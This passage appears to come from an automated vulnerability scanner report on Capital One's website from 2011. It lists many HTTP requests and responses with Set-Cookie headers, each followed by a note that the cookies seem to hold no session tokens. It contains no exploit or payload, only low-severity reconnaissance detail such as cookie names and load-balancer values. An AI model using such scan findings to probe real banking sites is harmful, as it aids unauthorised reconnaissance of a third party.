GET /contactus/olbsupport.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:34 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:34 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 25849
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Onlin ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /creditcards/balance_transfer_hp.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:11:53 GMT Server: Apache Location: http://www.capitalone.com/balance-transfer/ Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:11:53 GMT Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:52 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66271
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/popular/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:19 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D9%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:20 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directbanking/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:14 GMT Server: Apache Location: http://www.capitalone.com/directbanking/ Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:14 GMT Content-Length: 248 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directbanking/online-banking HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:15 GMT Server: Apache Location: http://www.capitalone.com/directbanking/online-banking/ Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:15 GMT Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-certificates-deposit/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_03_T_SP30&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:17 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:16 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:17 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 10034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:12 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 32067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/high-yield-money-market-account/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:08 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:08 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/interestplus-online-savings-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_01_T_SP29&itc=CAPITALONE1112FYINTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:07 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112FYINTMKTGDF; expires=Sun, 03-Apr-2011 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/rewards-money-market-account/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_05_T_DBREWMMA&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /financialeducation/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_06_T_FIN HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 27487
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Finan ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
